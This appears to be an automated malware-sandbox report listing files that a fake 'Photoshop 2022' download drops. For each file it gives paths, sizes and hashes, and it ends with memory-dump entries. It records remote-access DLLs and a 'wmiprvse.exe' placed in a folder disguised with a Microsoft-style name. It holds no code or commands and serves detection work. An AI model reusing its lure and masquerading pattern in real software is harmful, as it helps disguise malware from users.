7968839ca3e7337b2e7774d92c4a3666e9b7d8d76000475b39c2bda6db3320fc9b2100322505997798af5631a007787fbd8d0d6fe0b51949c545c67e696aaf1a

Download Submit
C:\Windows\Installer\MSIC1CB.tmp

Filesize
524KB

MD5
6ea65025106536eb75f026e46643b099

SHA1
d6f5801e370c92d8e5c2336b4022cc6cb6ec1f99

SHA256
dae76cce74d63e7935fde4383020659d75b68632f8a01f2053ec895e69bb4efb

SHA512
062aed4c7541346b7338e1d234a50aa9af76f103a65268ba65a42508a26c10cc27ccfce6131485403afa36d8a8cd69f3bf1e55cd1a1f675357b87228aacbb988

Download Submit
\??\c:\users\admin\appdata\local\temp\is-b8jon.tmp\{app}\hyilyjnhrxpmfieh.cab

Filesize
2.3MB

MD5
e5cb5b8ba64281ffe5bcbc9b7d6863b4

SHA1
35686e9c9dfe31b400b542f36a6a57def0cbcb2c

SHA256
bbc3d3c3af29adfb1d1ee8d8acda18d4375973b6c757b97e13654cc58c55052a

SHA512
179ff2b289aaac262141d513a191e77eab57ea0f84f70a81edfae6eb83cd02b08eb58d729d7c9093ec94b108ac22e592b43dbc131bf245c1bd440bba41aa1ee0

Download Submit
\ProgramData\regid.1993-06.com.microsoft\HTCTL32.DLL

Filesize
320KB

MD5
c94005d2dcd2a54e40510344e0bb9435

SHA1
55b4a1620c5d0113811242c20bd9870a1e31d542

SHA256
3c072532bf7674d0c5154d4d22a9d9c0173530c0d00f69911cdbc2552175d899

SHA512
2e6f673864a54b1dcad9532ef9b18a9c45c0844f1f53e699fade2f41e43fa5cbc9b8e45e6f37b95f84cf6935a96fba2950ee3e0e9542809fd288fefba34ddd6a

Download Submit
\ProgramData\regid.1993-06.com.microsoft\PCICHEK.DLL

Filesize
18KB

MD5
104b30fef04433a2d2fd1d5f99f179fe

SHA1
ecb08e224a2f2772d1e53675bedc4b2c50485a41

SHA256
956b9fa960f913cce3137089c601f3c64cc24c54614b02bba62abb9610a985dd

SHA512
5efcaa8c58813c3a0a6026cd7f3b34ad4fb043fd2d458db2e914429be2b819f1ac74e2d35e4439601cf0cb50fcdcafdcf868da328eaaeec15b0a4a6b8b2c218f

Download Submit
\ProgramData\regid.1993-06.com.microsoft\PCICL32.DLL

Filesize
3.6MB

MD5
d3d39180e85700f72aaae25e40c125ff

SHA1
f3404ef6322f5c6e7862b507d05b8f4b7f1c7d15

SHA256
38684adb2183bf320eb308a96cdbde8d1d56740166c3e2596161f42a40fa32d5

SHA512
471ac150e93a182d135e5483d6b1492f08a49f5ccab420732b87210f2188be1577ceaaee4ce162a7acceff5c17cdd08dc51b1904228275f6bbde18022ec79d2f

Download Submit
\ProgramData\regid.1993-06.com.microsoft\TCCTL32.DLL

Filesize
387KB

MD5
2c88d947a5794cf995d2f465f1cb9d10

SHA1
c0ff9ea43771d712fe1878dbb6b9d7a201759389

SHA256
2b92ea2a7d2be8d64c84ea71614d0007c12d6075756313d61ddc40e4c4dd910e

SHA512
e55679ff66ded375a422a35d0f92b3ac825674894ae210dbef3642e4fc232c73114077e84eae45c6e99a60ef4811f4a900b680c3bf69214959fa152a3dfbe542

Download Submit
\ProgramData\regid.1993-06.com.microsoft\msvcr100.dll

Filesize
755KB

MD5
0e37fbfa79d349d672456923ec5fbbe3

SHA1
4e880fc7625ccf8d9ca799d5b94ce2b1e7597335

SHA256
8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18

SHA512
2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

Download Submit
\ProgramData\regid.1993-06.com.microsoft\pcicapi.dll

Filesize
32KB

MD5
34dfb87e4200d852d1fb45dc48f93cfc

SHA1
35b4e73fb7c8d4c3fefb90b7e7dc19f3e653c641

SHA256
2d6c6200508c0797e6542b195c999f3485c4ef76551aa3c65016587788ba1703

SHA512
f5bb4e700322cbaa5069244812a9b6ce6899ce15b4fd6384a3e8be421e409e4526b2f67fe210394cd47c4685861faf760eff9af77209100b82b2e0655581c9b2

Download Submit
\ProgramData\regid.1993-06.com.microsoft\wmiprvse.exe

Filesize
117KB

MD5
c0eb3eac96511077dafc0afa64c6388c

SHA1
33e81f25493eda3bbf0b7cdcddd523547fa6c31e

SHA256
eec4f18f3655f7eab0c08783ad42d2b3ce3ef21ecad7394e165f11acdb41c42a

SHA512
2632bef55323d9a272e1519e2b2792527d28cbd9fe6a9f9d253e5729978be0de6f36b8e3b2acee70449ba22a33efb41c82c82afe19dad14698b3ada0006ca7fc

Download Submit
\Users\Admin\AppData\Local\Temp\INAB02A.tmp

Filesize
789KB

MD5
dd1f93eb81e6c99ba9be55b0c12e8bb4

SHA1
1d767983aaa4eb5c9e19409cf529969142033850

SHA256
f55b853958f07b15f0dae7a871c1ebe2ec117ef54ba3811d31cec4c8ae471d9b

SHA512
7968839ca3e7337b2e7774d92c4a3666e9b7d8d76000475b39c2bda6db3320fc9b2100322505997798af5631a007787fbd8d0d6fe0b51949c545c67e696aaf1a

Download Submit
\Users\Admin\AppData\Local\Temp\MSIB0B8.tmp

Filesize
524KB

MD5
6ea65025106536eb75f026e46643b099

SHA1
d6f5801e370c92d8e5c2336b4022cc6cb6ec1f99

SHA256
dae76cce74d63e7935fde4383020659d75b68632f8a01f2053ec895e69bb4efb

SHA512
062aed4c7541346b7338e1d234a50aa9af76f103a65268ba65a42508a26c10cc27ccfce6131485403afa36d8a8cd69f3bf1e55cd1a1f675357b87228aacbb988

Download Submit
\Users\Admin\AppData\Local\Temp\MSIB49F.tmp

Filesize
914KB

MD5
91d4a8c2c296ef53dd8c01b9af69b735

SHA1
ad2e5311a0f2dbba988fbdb6fcf70034fda3920d

SHA256
a787e7a1ad12783fcbf3f853940590329e0ff0dddf17282324f2d95ed6408f23

SHA512
63c5506a55dea2b3bd1c99b79b5668f5afc0104564e92f07afb42f2f2b67eae9d0e0174cb36e6095a27a6c71496206042079b6e5a2b2ff787f3cb9ef20995e9e

Download Submit
\Users\Admin\AppData\Local\Temp\is-17NE9.tmp\s0.tmp

Filesize
3.0MB

MD5
def270b0645785d3663833e1bbd00292

SHA1
a4bf9c01326d22c585ebca5238bed25de6d0ce20

SHA256
dc298623fc3a29511de8c2128348be8263099ab2cb77bc28847c1429a4a2385d

SHA512
21f970ee95cf514509e1399e6946f0460e2c8f303af76f7362b02caba5d03a6d7626cda58f0183d2206db5203b68ff32e1e51f910495edeafce4f43688776394

Download Submit
\Users\Admin\AppData\Local\Temp\is-B8JON.tmp\_isetup\_iscrypt.dll

Filesize
2KB

MD5
a69559718ab506675e907fe49deb71e9

SHA1
bc8f404ffdb1960b50c12ff9413c893b56f2e36f

SHA256
2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc

SHA512
e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

Download Submit
\Users\Admin\AppData\Local\Temp\is-C1A8D.tmp\_isetup\_isdecmp.dll

Filesize
28KB

MD5
077cb4461a2767383b317eb0c50f5f13

SHA1
584e64f1d162398b7f377ce55a6b5740379c4282

SHA256
8287d0e287a66ee78537c8d1d98e426562b95c50f569b92cea9ce36a9fa57e64

SHA512
b1fcb0265697561ef497e6a60fcee99dc5ea0cf02b4010da9f5ed93bce88bdfea6bfe823a017487b8059158464ea29636aad8e5f9dd1e8b8a1b6eaaab670e547

Download Submit
\Users\Admin\AppData\Local\Temp\is-C1A8D.tmp\idp.dll

Filesize
232KB

MD5
55c310c0319260d798757557ab3bf636

SHA1
0892eb7ed31d8bb20a56c6835990749011a2d8de

SHA256
54e7e0ad32a22b775131a6288f083ed3286a9a436941377fc20f85dd9ad983ed

SHA512
e0082109737097658677d7963cbf28d412dca3fa8f5812c2567e53849336ce45ebae2c0430df74bfe16c0f3eebb46961bc1a10f32ca7947692a900162128ae57

Download Submit
\Users\Admin\AppData\Local\Temp\is-C1A8D.tmp\s0.exe

Filesize
10.4MB

MD5
5e13c164608c54e8d3d8ea92a9826cba

SHA1
7eb6e4ce50e0ace888a2da5ed32cb564015d71bc

SHA256
5bd9243dca59a184da05784138aa9f14dc63dfd63ab9dc3efa61a86f4823be11

SHA512
5fe4109146ed23ff07a576c9b6eaffc507853416d33b99405b46ad379178d41e0c5f75589b1f73297d4cb27c7f9109791c71a40c2fda7a901954e85b859e3ab7

Download Submit
\Users\Admin\AppData\Local\Temp\is-C1A8D.tmp\s1.exe

Filesize
342KB

MD5
b0d18989b5bdfb438cae862119604315

SHA1
9dccf5bf64328a3e7a3bef933bb7893bfcbbe7d7

SHA256
0d1d5b6cc87361d5e572f4911d926e8072c72653f0e5ecf6f05ca1fb9e7aca34

SHA512
349c40a06df827249fdcfc39962556e8e356043c2b930742ef0f3554d548c7c54e3435183e6b8cfd7bbcf3aae2d134d2b8845d4c89454bfc71455cbe29409ae3

Download Submit
\Users\Admin\AppData\Local\Temp\is-C1A8D.tmp\s1.exe

Filesize
342KB

MD5
b0d18989b5bdfb438cae862119604315

SHA1
9dccf5bf64328a3e7a3bef933bb7893bfcbbe7d7

SHA256
0d1d5b6cc87361d5e572f4911d926e8072c72653f0e5ecf6f05ca1fb9e7aca34

SHA512
349c40a06df827249fdcfc39962556e8e356043c2b930742ef0f3554d548c7c54e3435183e6b8cfd7bbcf3aae2d134d2b8845d4c89454bfc71455cbe29409ae3

Download Submit
\Users\Admin\AppData\Local\Temp\is-C1A8D.tmp\s2.exe

Filesize
4.5MB

MD5
fa24733f5a6a6f44d0e65d7d98b84aa6

SHA1
51a62beab55096e17f2e17f042f7bd7dedabf1ae

SHA256
da1b144b5f908cb7e811489dfe660e06aa6df9c9158c6972ec9c79c48afacb7e

SHA512
1953201d8cd448aa7d23c3e57665546ace835f97c8cc8d0f323573cef03a6f317f86c7c3841268ece1760b911c67845d7e6aa198a44f720dca02a5a8bcb8e21e

Download Submit
\Users\Admin\AppData\Local\Temp\is-NS6G2.tmp\Download Photoshop 2022 3 rar.tmp

Filesize
3.1MB

MD5
a881ba14b29e748d857fbad50f98ced8

SHA1
49cfc40c1ffe3e701f9e6ce16c62feebfec4c5c1

SHA256
f7a863249622223ce16191291e7c97da826c389eb7e864a1dae26f88a3d47a06

SHA512
c9c174331d68420fcd943ba4a8fd38746b9e401bfdbeaf068b31f9f16ce099f1e9b819d801cb2ae3fb27e69a88d8c6c8c0eb98fc78770e85ab4ebe460b2622f9

Download Submit
\Users\Admin\AppData\Local\Temp\is-RI059.tmp\setup.tmp

Filesize
3.1MB

MD5
655ccd69960d6d2bc424ee9300a0d69c

SHA1
f61162f11ca4aeab422a40d5e7c4197a01cfec52

SHA256
18e169535cad807dfe756e1a6f4fc8cc9ec958804a2567c97dff419576b06352

SHA512
a60ed1b21bb5bb67f7303709b24f3ae707338b25a465ae4aeee0e6d77b8d574310635befae8be3296b6f09dba1611fe139d2dfcffb1cc7aded0ff4d722d10781

Download Submit
\Users\Admin\AppData\Local\Temp\is-UGUNP.tmp\setup.exe

Filesize
1.7MB

MD5
2496404367b95b0a4b7f6ab45e0b77ae

SHA1
88a046206a160f2cbe4a433dfdf9b8c0b262e4ae

SHA256
188a0ad786c07c92d2874df5e1e053f9b81f00e8411f00198ab90c9c832a85dc

SHA512
91b277469719e3a41e0a96bc40be2af8de5d4e79855ad5eea634d418c136ad6107911f96e1a53a1d0cd2ab5c4cd828ce6445e40cd3ae95bb79568996dd4c6d42

Download Submit
\Users\Admin\AppData\Local\Temp\is-UGUNP.tmp\setup.exe

Filesize
1.7MB

MD5
2496404367b95b0a4b7f6ab45e0b77ae

SHA1
88a046206a160f2cbe4a433dfdf9b8c0b262e4ae

SHA256
188a0ad786c07c92d2874df5e1e053f9b81f00e8411f00198ab90c9c832a85dc

SHA512
91b277469719e3a41e0a96bc40be2af8de5d4e79855ad5eea634d418c136ad6107911f96e1a53a1d0cd2ab5c4cd828ce6445e40cd3ae95bb79568996dd4c6d42

Download Submit
\Users\Admin\AppData\Local\Temp\is-UGUNP.tmp\setup.exe

Filesize
1.7MB

MD5
2496404367b95b0a4b7f6ab45e0b77ae

SHA1
88a046206a160f2cbe4a433dfdf9b8c0b262e4ae

SHA256
188a0ad786c07c92d2874df5e1e053f9b81f00e8411f00198ab90c9c832a85dc

SHA512
91b277469719e3a41e0a96bc40be2af8de5d4e79855ad5eea634d418c136ad6107911f96e1a53a1d0cd2ab5c4cd828ce6445e40cd3ae95bb79568996dd4c6d42

Download Submit
\Users\Admin\AppData\Local\Temp\is-UGUNP.tmp\setup.exe

Filesize
1.7MB

MD5
2496404367b95b0a4b7f6ab45e0b77ae

SHA1
88a046206a160f2cbe4a433dfdf9b8c0b262e4ae

SHA256
188a0ad786c07c92d2874df5e1e053f9b81f00e8411f00198ab90c9c832a85dc

SHA512
91b277469719e3a41e0a96bc40be2af8de5d4e79855ad5eea634d418c136ad6107911f96e1a53a1d0cd2ab5c4cd828ce6445e40cd3ae95bb79568996dd4c6d42

Download Submit
\Users\Admin\AppData\Local\Temp\is-UGUNP.tmp\setup.exe

Filesize
1.7MB

MD5
2496404367b95b0a4b7f6ab45e0b77ae

SHA1
88a046206a160f2cbe4a433dfdf9b8c0b262e4ae

SHA256
188a0ad786c07c92d2874df5e1e053f9b81f00e8411f00198ab90c9c832a85dc

SHA512
91b277469719e3a41e0a96bc40be2af8de5d4e79855ad5eea634d418c136ad6107911f96e1a53a1d0cd2ab5c4cd828ce6445e40cd3ae95bb79568996dd4c6d42

Download Submit
\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\decoder.dll

Filesize
206KB

MD5
8a3f1a0da39530dcb8962dd0fadb187f

SHA1
d5294f6be549ec1f779da78d903683bab2835d1a

SHA256
c6988e36b1e1d6ffc89d9fa77ad35f132f5aa89e680d0155e0b6aee1c524c99f

SHA512
1e0d5be3ee164fb16de629a975f3c3da61659b99a0fc766850ffeeddb2d32b7ee0d3b85c77f01d34d9fe2933bd7bd11c6dba7b35d30faed7ce09485fd706d49d

Download Submit
\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\decoder.dll

Filesize
206KB

MD5
8a3f1a0da39530dcb8962dd0fadb187f

SHA1
d5294f6be549ec1f779da78d903683bab2835d1a

SHA256
c6988e36b1e1d6ffc89d9fa77ad35f132f5aa89e680d0155e0b6aee1c524c99f

SHA512
1e0d5be3ee164fb16de629a975f3c3da61659b99a0fc766850ffeeddb2d32b7ee0d3b85c77f01d34d9fe2933bd7bd11c6dba7b35d30faed7ce09485fd706d49d

Download Submit
memory/924-107-0x00000000003D0000-0x00000000003D1000-memory.dmp

Filesize
4KB

Download
memory/924-249-0x0000000000400000-0x000000000071C000-memory.dmp

Filesize
3.1MB

Download
memory/924-397-0x0000000000400000-0x000000000071C000-memory.dmp

Filesize
3.1MB

Download
memory/924-138-0x0000000000400000-0x000000000071C000-memory.dmp

Filesize
3.1MB

Download
memory/924-1350-0x0000000000400000-0x000000000071C000-memory.dmp

Filesize
3.1MB

Download
memory/1152-644-0x0000000000450000-0x0000000000451000-memory.dmp

Filesize
4KB

Download
memory/1216-307-0x0000000000400000-0x000000000071B000-memory.dmp

Filesize
3.1MB

Download
memory/1216-230-0x00000000003C0000-0x00000000003C1000-memory.dmp

Filesize
4KB

Download
memory/1456-109-0x0000000000400000-0x000000000071C000-memory.dmp

Filesize
3.1MB

Download
memory/1456-67-0x0000000000400000-0x000000000071C000-memory.dmp

Filesize
3.1MB

Download
memory/1456-62-0x00000000001E0000-0x00000000001E1000-memory.dmp

Filesize
4KB

Download
memory/1600-218-0x0000000000400000-0x00000000004D8000-memory.dmp

Filesize
864KB

Download
memory/1600-311-0x0000000000400000-0x00000000004D8000-memory.dmp

Filesize
864KB

Download
memory/1628-2155-0x0000000140000000-0x00000001405E8000-memory.dmp

Filesize
5.9MB

Download
memory/1628-2154-0x0000000140000000-0x00000001405E8000-memory.dmp

Filesize
5.9MB

Download
memory/1628-2109-0x00000000006B0000-0x00000000006B1000-memory.dmp

Filesize
4KB

Download
memory/1628-1957-0x0000000140000000-0x00000001405E8000-memory.dmp

Filesize
5.9MB

Download
memory/1628-1956-0x0000000140000000-0x00000001405E8000-memory.dmp

Filesize
5.9MB

Download
memory/1636-399-0x0000000000400000-0x00000000006B1000-memory.dmp

Filesize
2.7MB

Download
memory/1636-374-0x00000000002D0000-0x0000000000312000-memory.dmp

Filesize
264KB

Download
memory/1648-110-0x0000000000400000-0x00000000004D8000-memory.dmp

Filesize
864KB

Download
memory/1648-92-0x0000000000400000-0x00000000004D8000-memory.dmp

Filesize
864KB

Download
memory/1768-54-0x0000000000400000-0x00000000004D8000-memory.dmp

Filesize
864KB

Download
memory/1768-66-0x0000000000400000-0x00000000004D8000-memory.dmp

Filesize
864KB

Download
memory/1980-1866-0x0000000007350000-0x0000000007351000-memory.dmp

Filesize
4KB

Download
memory/1980-1884-0x0000000008DB0000-0x0000000008DB1000-memory.dmp

Filesize
4KB

Download
memory/1980-1868-0x0000000007360000-0x0000000007361000-memory.dmp

Filesize
4KB

Download
memory/1980-1869-0x00000000073B0000-0x00000000073B1000-memory.dmp

Filesize
4KB

Download
memory/1980-1870-0x00000000073C0000-0x00000000073C1000-memory.dmp

Filesize
4KB

Download
memory/1980-1871-0x00000000073D0000-0x00000000073D1000-memory.dmp

Filesize
4KB

Download
memory/1980-1872-0x00000000073E0000-0x00000000073E1000-memory.dmp

Filesize
4KB

Download
memory/1980-1873-0x0000000008D40000-0x0000000008D41000-memory.dmp

Filesize
4KB

Download
memory/1980-1874-0x0000000008D90000-0x0000000008D91000-memory.dmp

Filesize
4KB

Download
memory/1980-1875-0x0000000008DA0000-0x0000000008DA1000-memory.dmp

Filesize
4KB

Download
memory/1980-2034-0x00000000002C0000-0x00000000002C1000-memory.dmp

Filesize
4KB

Download
memory/1980-1847-0x0000000004D00000-0x0000000004D01000-memory.dmp

Filesize
4KB

Download
memory/1980-1846-0x00000000002C0000-0x00000000002C1000-memory.dmp

Filesize
4KB

Download
memory/1980-1867-0x0000000007340000-0x0000000007341000-memory.dmp

Filesize
4KB

Download
memory/1980-1849-0x0000000007020000-0x0000000007021000-memory.dmp

Filesize
4KB

Download
memory/1980-1865-0x0000000006F90000-0x0000000006F91000-memory.dmp

Filesize
4KB

Download
memory/1980-1848-0x0000000006820000-0x0000000006821000-memory.dmp

Filesize
4KB

Download
memory/1980-1850-0x0000000006FD0000-0x0000000006FD1000-memory.dmp

Filesize
4KB

Download
memory/2492-1899-0x0000000000240000-0x0000000000241000-memory.dmp

Filesize
4KB

Download
memory/2536-1797-0x00000000010F0000-0x0000000001572000-memory.dmp

Filesize
4.5MB

Download
memory/2536-1793-0x00000000036B0000-0x00000000036F0000-memory.dmp

Filesize
256KB

Download
memory/2536-1790-0x00000000010F0000-0x0000000001572000-memory.dmp

Filesize
4.5MB

Download
memory/2536-1789-0x00000000010F0000-0x0000000001572000-memory.dmp

Filesize
4.5MB

Download
memory/2848-1878-0x0000000002480000-0x00000000024C0000-memory.dmp

Filesize
256KB

Download
memory/2848-1877-0x0000000002480000-0x00000000024C0000-memory.dmp

Filesize
256KB

Download
memory/2848-1876-0x0000000002480000-0x00000000024C0000-memory.dmp

Filesize
256KB

Download